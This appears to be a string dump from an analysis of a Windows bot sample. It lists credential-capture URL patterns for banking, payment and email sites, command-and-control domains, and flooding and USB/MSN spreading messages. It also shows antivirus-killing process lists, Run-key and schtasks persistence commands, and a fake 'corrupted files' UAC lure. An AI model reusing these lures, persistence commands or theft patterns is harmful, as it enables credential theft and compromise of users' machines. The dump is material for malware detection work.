'%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%System%\calc.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe</pre><pre>7 767<7~7</pre><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\calc.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exe</pre><b>calc.exe_1160_rwx_00A00000_00027000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.rsrc</pre><pre>@.reloc</pre><pre>PSSSSSSh</pre><pre>PSSVSSh</pre><pre>RPVSSh</pre><pre>PSSh(</pre><pre>PSSh#</pre><pre>PSSh'</pre><pre>PSSh&</pre><pre>PSSh*</pre><pre>9p.uV</pre><b>calc.exe_1160_rwx_00A28000_00072000:</b><pre>Opera/9.00 (Windows NT 5.1; U; en)</pre><pre>Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)</pre><pre>Mozilla/4.0 (compatible; MSIE 6.01; Windows NT 6.0)</pre><pre>Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2)</pre><pre>Opera 9.4 (Windows NT 6.1; U; en)</pre><pre>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)</pre><pre>Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; NeosBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)</pre><pre>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0; .NET CLR 1.1.4322; Windows-Media-Player/10.00.00.3990; InfoPath.2</pre><pre>Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060410 Firefox/1.0.8</pre><pre>Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11</pre><pre>Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)</pre><pre>Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50726)</pre><pre>SbieDll.dll</pre><pre>Software\Classes\CLSID\%s\X</pre><pre>Software\Classes\CLSID\%s\X\%s</pre><pre>0xX</pre><pre>SB:0xX</pre><pre>G:%s_0xX_%c:%s_v1$</pre><pre>Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u</pre><pre>IEXPLORE.EXE</pre><pre>IE.HTTP</pre><pre>SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice</pre><pre>IE.HTTPS</pre><pre>SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoice</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\UserChoice</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoice</pre><pre>IE.AssocFile.HTM</pre><pre>HTTP\shell\open\command</pre><pre>Software\Microsoft\Windows\CurrentVersion\Ext\Settings\%s</pre><pre>Psapi.dll</pre><pre>%s\%s</pre><pre>Software\Adobe\Acrobat Reader\%s\Privileged</pre><pre>mscoree.dll</pre><pre>HARDWARE\DESCRIPTION\System\CentralProcessor\%u</pre><pre>SOFTWARE\Microsoft\Windows NT\CurrentVersion</pre><pre>nspr4.dll</pre><pre>nss3.dll</pre><pre>Urlmon.dll</pre><pre>URLDownloadToFileW</pre><pre>Netapi32.dll</pre><pre>76487-640-1457236-23837</pre><pre>76487-337-8429955-22614</pre><pre>76487-644-3177037-23510</pre><pre>76497-640-6308873-23835</pre><pre>55274-640-2673064-23950</pre><pre>76487-640-8834005-23195</pre><pre>76487-640-0716662-23535</pre><pre>76487-644-8648466-23106</pre><pre>00426-293-8170032-85146</pre><pre>76487-341-5883812-22420</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsBackup</pre><pre>{8E5E2654-AD2D-48BF-AC2D-D17F00898D06}</pre><pre>snxhk.dll</pre><pre>comctl32.dll</pre><pre>ZwSetValueKey</pre><pre>ZwDeleteValueKey</pre><pre>SOFTWARE\%s</pre><pre>update.microsoft.com</pre><pre>microsoft.com</pre><pre>windowsupdate.microsoft.com</pre><pre>JOIN</pre><pre>PRIVMSG</pre><pre>.rdata</pre><pre>cmd_option.%s</pre><pre>/c %s</pre><pre>cmd.exe</pre><pre>msvcrt.dll</pre><pre>--x-x-x-xx</pre><pre>Content-Type: multipart/form-data; boundary=x-x-x-xx</pre><pre>Content-Disposition: multipart/form-data; name="newfile"; filename="%d.jpeg"</pre><pre>%s?action=up&g=%s</pre><pre>xul.dll</pre><pre><Port></Port></pre><pre><Pass></Pass></pre><pre>Content-Type: application/x-www-form-urlencoded</pre><pre>HTTP/1.1</pre><pre>?pid=%d</pre><pre>?page=%d</pre><pre>?id=%u</pre><pre>%s=%u&%s=%s</pre><pre>%s=%s&%s=%u</pre><pre>&%s=%s</pre><pre>&%s%u=</pre><pre>&%s%hu=</pre><pre>&%s=_%u</pre><pre>%d|%s|%s|%s</pre><pre>.info</pre><pre>httpget</pre><pre>GET /%s HTTP/1.1</pre><pre>Host: %s</pre><pre>Content-Length: %d</pre><pre>Accept: %s</pre><pre>Accept-Language: %s</pre><pre>Accept-Charset: %s</pre><pre>Accept-Encoding: %s</pre><pre>User-Agent: %s</pre><pre>Referer: %s</pre><pre>Connection: %s</pre><pre>http://</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>tbb-firefox.exe</pre><pre>%s:%hu</pre><pre>windowsupdate</pre><pre>SSH2_MSG_KEXINIT</pre><pre>SSH2_MSG_DISCONNECT</pre><pre>SSH2_MSG_USERAUTH_SUCCESS</pre><pre>http://%s%s/image.php?id=%s</pre><pre>TaskDialogIndirect</pre><pre>http://answers.microsoft.com/en-us/windows/forum/windows_vista-windows_programs/corrupted-documents-folder/e2a7660f-8eea-4f27-b2e6-e77a0f0c1535</pre><pre>ÐxX</pre><pre>ntdll.dll</pre><pre>kernel32.dll</pre><pre>secur32.dll</pre><pre>crypt32.dll</pre><pre>user32.dll</pre><pre>advapi32.dll</pre><pre>wininet.dll</pre><pre>shell32.dll</pre><pre>shlwapi.dll</pre><pre>ole32.dll</pre><pre>version.dll</pre><pre>sfc.dll</pre><pre>dnsapi.dll</pre><pre>ws2_32.dll</pre><pre><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></pre><pre><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></pre><pre>8"808]9|9</pre><pre>9%9 919<9</pre><pre>=(=/=6==={=</pre><pre>4 4?4^4}4</pre><pre>6o6g6r6w6</pre><pre>9 9$9(90949</pre><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.rsrc</pre><pre>This pointer, %d, is aligned on %d</pre><pre>This pointer, %d, is not aligned on %d</pre><pre>%f, %f and %f form a right-angled triangle.</pre><pre>Invalid parameter passed to C runtime function.</pre><pre>?#%X.y</pre><pre>%S#[k</pre><pre>Please contact the application's support team for more information.</pre><pre>- Attempt to initialize the CRT more than once.</pre><pre>- CRT not initialized</pre><pre>- floating point support not loaded</pre><pre>GetProcessWindowStation</pre><pre>USER32.DLL</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>GetCPInfo</pre><pre>GetWindowsDirectoryA</pre><pre>CreatePipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetConsoleOutputCP</pre><pre>KERNEL32.dll</pre><pre>.VI3xqr</pre><pre>zcÁ</pre><pre>Udp?iw0</pre><pre>/#"%f</pre><pre>P.oUw</pre><pre>B%Su[</pre><pre>Rkka.by</pre><pre>.dYi'</pre><pre>p.Cvq</pre><pre>.EU{%</pre><pre>D<w><pre>;0.Bx</pre><pre>%s)$O</pre><pre>i.zC:*</pre><pre>@7WeB</pre><pre>ld0%F</pre><pre>r. -.kN</pre><pre>.kal"</pre><pre>f.xKK</pre><pre>Software\Classes\CLSID\%S</pre><pre>G:%S_0xX</pre><pre>chrome.exe</pre><pre>opera.exe</pre><pre>safari.exe</pre><pre>maxthon.exe</pre><pre>:Mozilla\Firefox\Profiles</pre><pre>cookies.sqlite</pre><pre>%s\winsxs\x86_microsoft.windows.common-controls_*6.0.*_*</pre><pre>%s\winsxs\%s\comctl32.dll</pre><pre>SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\%s</pre><pre>%s:*:Enabled</pre><pre>avcuf32.dll</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Run</pre><pre>prstrui.exe</pre><pre>Windows Defender</pre><pre>MpClient.dll</pre><pre>Windows Defender\MSASCui.exe</pre><pre>MpSvc.dll</pre><pre>msseces.exe</pre><pre>MsMpEng.exe</pre><pre>MSASCui.exe</pre><pre>MpAsDesc.dll</pre><pre>MsMpLics.dll</pre><pre>avgui.exe</pre><pre>avgidsagent.exe</pre><pre>avgwdsvc.exe</pre><pre>avgdiagex.exe</pre><pre>avgmfapx.exe</pre><pre>avgupd.exe</pre><pre>avgcfgex.exe</pre><pre>avgnt.exe</pre><pre>avguard.exe</pre><pre>avshadow.exe</pre><pre>avcenter.exe</pre><pre>update.dll</pre><pre>updaterc.dll</pre><pre>usrreq.exe</pre><pre>ccsvchst.exe</pre><pre>symerr.exe</pre><pre>NIS.exe</pre><pre>NAV.exe</pre><pre>navw32.exe</pre><pre>avastui.exe</pre><pre>AvastEmUpdate.exe</pre><pre>ashUpd.exe</pre><pre>WRSA.exe</pre><pre>zatray.exe</pre><pre>ForceField.exe</pre><pre>updating.dll</pre><pre>fshoster32.exe</pre><pre>fsaua.dll</pre><pre>PSUNMain.exe</pre><pre>PSUAService.exe</pre><pre>PSANHost.exe</pre><pre>PSUNScan.dll</pre><pre>epavjobs.exe</pre><pre>AVENGINE.exe</pre><pre>Upgrader.exe</pre><pre>adaware.exe</pre><pre>BullGuard.exe.manifest</pre><pre>BullGuardUpdate.exe</pre><pre>BullGuard.exe</pre><pre>BullGuardScanner.exe</pre><pre>BullGuardBhvScanner.exe</pre><pre>BullGuardUpdate2.exe</pre><pre>BgScan.exe</pre><pre>BgScanEngine.dll</pre><pre>.manifest</pre><pre>updater.exe</pre><pre>Backup\RSD\RSSetup\updater.exe</pre><pre>RsTray.exe</pre><pre>RavMonD.exe</pre><pre>RsMgrSvc.exe</pre><pre>rsmain.exe</pre><pre>RsScan.dll</pre><pre>RsTray.dll</pre><pre>mbamgui.exe</pre><pre>mbam.exe</pre><pre>pctsGui.exe</pre><pre>pctsAuxs.exe</pre><pre>pctsSvc.exe</pre><pre>Update.exe</pre><pre>UpdateHlpr.dll</pre><pre>Definitions\vcore.dll</pre><pre>sbamui.exe</pre><pre>SBAMTray.exe</pre><pre>updater_client_mod.dll</pre><pre>FProtTray.exe</pre><pre>FPWin.exe</pre><pre>scf.dat</pre><pre>ALUpdate.exe</pre><pre>update_tmp.exe</pre><pre>arcaclean.exe</pre><pre>BavUpdater.exe</pre><pre>rcfp.exe</pre><pre>CLPSLA.exe</pre><pre>op_mon.exe</pre><pre>niu.exe</pre><pre>K7TSUpdT.exe</pre><pre>sguardxup.exe</pre><pre>ccupdate.exe</pre><pre>caupdate.dll</pre><pre>a2guard.exe</pre><pre>a2start.exe</pre><pre>a2service.exe</pre><pre>AVKTray.exe</pre><pre>GDSC.exe</pre><pre>AVK.exe</pre><pre>GDFirewallTray.exe</pre><pre>Bka.exe</pre><pre>BLuPro.exe</pre><pre>BkavSystemServer.exe</pre><pre>BkavService.exe</pre><pre>LiveUpdate.dll</pre><pre>LiveConnect.dll</pre><pre>BaseFile\Bkav\LiveUpdate.dll</pre><pre>V3Lite.exe</pre><pre>ASDSvc.exe</pre><pre>autoup.exe</pre><pre>downloader.exe</pre><pre>%s.config</pre><pre>updatesrv.exe</pre><pre>updatemgr.dll</pre><pre>egui.exe</pre><pre>ekrn.exe</pre><pre>x86\ekrn.exe</pre><pre>uWinMgr.exe</pre><pre>coreServiceShell.exe</pre><pre>uiSeAgnt.exe</pre><pre>uiWatchDog.exe</pre><pre>plugins\plugUpdater.dll</pre><pre>UiFrmwrk\uiUpdateTray.exe</pre><pre>coreFrameworkHost.exe</pre><pre>mcagent.exe</pre><pre>McSvHost.exe</pre><pre>McUICnt.exe</pre><pre>McPvTray.exe</pre><pre>mcui_exe</pre><pre>mcpltui_exe</pre><pre>mcshell.exe</pre><pre>mcupdmgr.exe</pre><pre>mcupdate.exe</pre><pre>mcshield.exe</pre><pre>mcupdui.dll</pre><pre>McAPExe.exe</pre><pre>.config</pre><pre>Image File Execution Options\%s</pre><pre>SYSTEM\CurrentControlSet\services\%s</pre><pre>%c:\ntusbdriver.sys</pre><pre>%c:\*p.exe</pre><pre>%c:\%s</pre><pre>p.exe</pre><pre>%WinDir%\explorer.exe</pre><pre>/C start /d. %s&"%s"</pre><pre>%COMSPEC%</pre><pre>%WinDir%\system32\shell32.dll</pre><pre>%c:\%s.lnk</pre><pre>VisthAux.exe</pre><pre>explorer.exe</pre><pre>t.minecraft</pre><pre>Works! PID: %d, Name: %s</pre><pre>cmdvirth</pre><pre>%s%s\X</pre><pre>tcp://</pre><pre>svchost.exe</pre><pre>csrss.exe</pre><pre>lsass.exe</pre><pre>smss.exe</pre><pre>wscript.exe</pre><pre>cscript.exe</pre><pre>vbc.exe</pre><pre>rundll32.exe</pre><pre>regsvr32.exe</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</pre><pre>winlogon.exe</pre><pre>services.exe</pre><pre>%s\x.lnk</pre><pre>SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%s</pre><pre>desktop.ini</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce</pre><pre>SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows</pre><pre>wintrust.dll</pre><pre>chrome.dll</pre><pre>Applications\iexplore.exe\shell\open\command</pre><pre>%s_xx</pre><pre>x.zip</pre><pre>Navw32.exe</pre><pre>SysInspector.exe</pre><pre>avscan.exe</pre><pre>mfefire.exe</pre><pre>wuauclt.exe</pre><pre>WerFault.exe</pre><pre>lFileZilla\sitemanager.xml</pre><pre>port</pre><pre>Sites.dat</pre><pre>Quick.dat</pre><pre>%s\3\%s</pre><pre>%s\4\%s</pre><pre>spoolsv.exe</pre><pre>steam.exe</pre><pre>skype.exe</pre><pre>origin.exe</pre><pre>dwm.exe</pre><pre>tapi3.dll</pre><pre>/C copy "%s" "%s"</pre><pre>SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run</pre><pre>Windows Update Service</pre><pre>"%s" /%s</pre><pre>Software\Microsoft\Windows\CurrentVersion\RunOnce</pre><pre>/CREATE /SC ONLOGON /TN "Windows Update Check - 0xX" /TR "%s" /RL HIGHEST</pre><pre>schtasks.exe</pre><pre>/DELETE /TN "Windows Update Check - 0xX" /F</pre><pre>\Windows\Explorer.exe</pre><pre>Low_X</pre><pre>%s.manifest</pre><pre>PendingFileRenameOperations</pre><pre>%s\X</pre><pre>Windows\CurrentVersion\Run</pre><pre>CurrentVersion\Windows</pre><pre>Windows NT\CurrentVersion\Image File Execution Options\%s</pre><pre>Windows has encountered a corrupted folder on your hard drive</pre><pre>Multiple corrupted files have been found in the folder 'My Documents'. To prevent serious loss of data, please allow Windows to restore these files.</pre><pre>Corrupted folder: %s</pre><pre>Corrupted file count: %d</pre><pre><a href=".ms">%s</a></pre><pre>/c start "" "%s" /%s "%s"</pre><pre>shell32,ShellExec_RunDLL "%s" /%s "%s"</pre><pre>You denied the proper privileges to the Windows file restoration utility. Please select YES on the following UAC prompt to allow Windows to restore the corrupted files.</pre><pre>Windows 3.1 Update Service</pre><pre>%s:Zone.Identifier</pre><pre>%s\X.pif</pre><pre>KERNEL32.DLL</pre><pre>KERNELBASE.DLL</pre><pre>kernelbase.dll</pre><pre>oSome operation could not be performed because the system is out of resources. Close some windows and try again.</pre><pre>Setting bit transparency color is not allowed for png images containing alpha value for each pixel (COLOR_RGBALPHA and COLOR_GRAYSCALEALPHA)OThis operation is not valid because the current image contains no valid header.4The new size provided for image resizing is invalid.oThe "Portable Network Graphics" could not be created because invalid image type parameters have being provided.2Software\Microsoft\Windows\CurrentVersion\Explorer</pre><pre>UThis "Portable Network Graphics" image is invalid because it has missing image parts.[Could not decompress the image because it contains invalid compressed data.</pre><pre>Description: BThe "Portable Network Graphics" image contains an invalid palette.</pre><pre>The file being read is not a valid "Portable Network Graphics" image because it contains an invalid header. This file may be corrupted, try obtaining it againnThis "Portable Network Graphics" image is not supported or it might be invalid.</pre><pre>This "Portable Network Graphics" image is not supported because either its width or height exceeds the maximum size of 65535 pixels.</pre><pre>There is no such palette entry.dThis "Portable Network Graphics" image contains an unknown critical part which could not be decoded.pThis "Portable Network Graphics" image is encoded with an unknown compression scheme which could not be decoded.cThis "Portable Network Graphics" image uses an unknown interlace scheme which could not be decoded.-The chunks must be compatible to be assigned.jThis "Portable Network Graphics" image is invalid because the decoder found an unexpected end of the file.8This "Portable Network Graphics" image contains no data.]The program tried to add a existent critical chunk to the current image which is not allowed.IIt's not allowed to add a new chunk because the current image is invalid.7The png image could not be loaded from the resource ID.)Class '%s' is already registered for '%s'%Class '%s' is not registered for '%s'</pre><pre>%s parameter cannot be nil#Feature not supported by this style</pre><pre>Style '%s' is not registered"Cannot unregister the system style</pre><pre>OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters</pre><pre>Failed to Save StreamjThis "Portable Network Graphics" image is not valid because it contains invalid pieces of data (crc error)yThe "Portable Network Graphics" image could not be loaded because one of its main piece of data (ihdr) might be corrupted</pre><pre>Login</pre><pre>"%s" is an invalid pathÊnnot remove shell notification icon"%s requires Windows Vista or later</pre><pre>Button%d</pre><pre>RadioButton%d</pre><pre>Unable to load style '%s'</pre><pre>Unable to load styles: %s</pre><pre>Style '%s' already registered#Style class '%s' already registered</pre><pre>Style '%s' not found</pre><pre>Style class '%s' not found</pre><pre>All Clipboard does not support Icons</pre><pre>Cannot open clipboard: %s</pre><pre>Text exceeds memo capacity Operation not supported on selected printer.There is no default printer currently selected/Menu '%s' is already being used by another form</pre><pre>- Dock zone has no controlLError loading dock zone from the stream. Expecting version %d, but found %d.7Length of value array must be >= length of prompt array</pre><pre>&Password</pre><pre>Value must be between %d and %d</pre><pre>%s on %s@GroupIndex cannot be less than a previous menu item's GroupIndex5Cannot create form. No MDI forms are currently active0Can only modify an image if it contains a bitmap*A control cannot have itself as its parent</pre><pre>Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window$Parent given is not a parent of '%s'</pre><pre>%s property out of rangeGNo single cast observer with ID %d was added to the observer collectionFNo multi cast observer with ID %d was added to the observer collection</pre><pre>Scan line index out of range!Cannot change the size of an iconÊnnot change the size of a WIC Image$Unknown picture file extension (.%s)</pre><pre>Unsupported clipboard format</pre><pre>Canvas does not allow drawing#Text format flag '%s' not supported</pre><pre>Windows Server 2003</pre><pre>Windows Server 2003 R2</pre><pre>Windows Server 2012</pre><pre>Windows 8</pre><pre>Error writing zip file"Invalid Zip Local Header signature$Invalid Zip Central Header signature1Support for compression method not registered: %s</pre><pre>Observer is not supportedLCannot have multiple single cast observers added to the observers collection4The object does not implement the observer interface5Insufficient RTTI available to support this operation</pre><pre>Parameter count mismatch<Type><pre>Windows</pre><pre>Windows Vista</pre><pre>Windows Server 2008</pre><pre>Windows 7</pre><pre>Windows Server 2008 R2</pre><pre>Windows 2000</pre><pre>Windows XP</pre><pre>Timespan too longbThe duration cannot be returned because the absolute value exceeds 